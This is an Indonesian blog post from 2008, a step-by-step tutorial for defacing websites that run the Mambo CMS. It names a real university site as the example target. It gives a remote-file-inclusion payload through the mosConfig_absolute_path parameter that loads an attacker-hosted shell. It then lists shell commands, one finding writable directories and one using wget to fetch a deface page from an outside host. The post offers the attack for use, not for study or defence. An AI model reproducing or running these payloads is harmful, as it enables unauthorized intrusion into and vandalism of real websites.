Sunday, July 6, 2008

Deface situs Mambo

. Sunday, July 6, 2008

Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :

1. http://sukan.upm.edu.my/Buletin/index.php?option=com_content&task=view&id=17&Itemid=2

2. Kemudian hapus/delete option=com_content&task=view&id=17&Itemid=2 di url/browsing sehingga menjadi http://sukan.upm.edu.my/Buletin/index.php?

3. Masukkan bug ini di belakang situs tadi :

_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=

Misal nya http://sukan.upm.edu.my/Buletin/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=

4. Masukkan file inject ini di belakang nya lagi :

http://k.domaindlx.com/jambihackerlinkcrew/sql2.htm

Misal nya http://sukan.upm.edu.my/Buletin/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://k.domaindlx.com/jambihackerlinkcrew/sql2.htm?

5. Di kolom Execute Command ketik :

find / -perm 777 -type d atau find / -perm 755 -type d

Tunggu beberapa saat.......

6. Kalo foldernya Permision Denied berarti kita tidak bisa apa2 di folder itu. Cari folder yg tidak ada tulisan Permision Denied.

Contoh Permision Denied :

find: /var/tux: Permission denied
find: /var/gdm: Permission denied
find: /tmp/ssh-XXcnJoE9: Permission denied
find: /tmp/orbit-root: Permission denied

Kita cari yg lain tapi usahakan foldernya yg /var/www/ kalo tidak ada juga tidak apa2.

Contoh folder yg bisa : /opt/orion

7. Masukkan file deface ini :

http://k.domaindlx.com/jambihackerlinkcrew/jh.htm

8. Di kolom Execute Command ketik :

cd /opt/orion;wget http://k.domaindlx.com/jambihackerlinkcrew/jh.htm

Tunggu beberapa saat.......

10:35:02 (4 KB/s) - `jh.htm' saved

Itu artinya sukses ke save

9. Cara lihat hasil nya :

http://sukan.upm.edu.my/Buletin/opt/orion/[file deface tadi]

10. Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi, misal nya : http://sukan.upm.edu.my/Buletin/opt/orion/jh.htm
Kalo nggak ada hasil nya coba klik tab Refresh yg ada diatas disamping url/browsing. kutipan dari J4mbi H4ck3r

1 comments:

Oeoes said...

wah kayaknya tutor ini untuk mambo versi lama bossss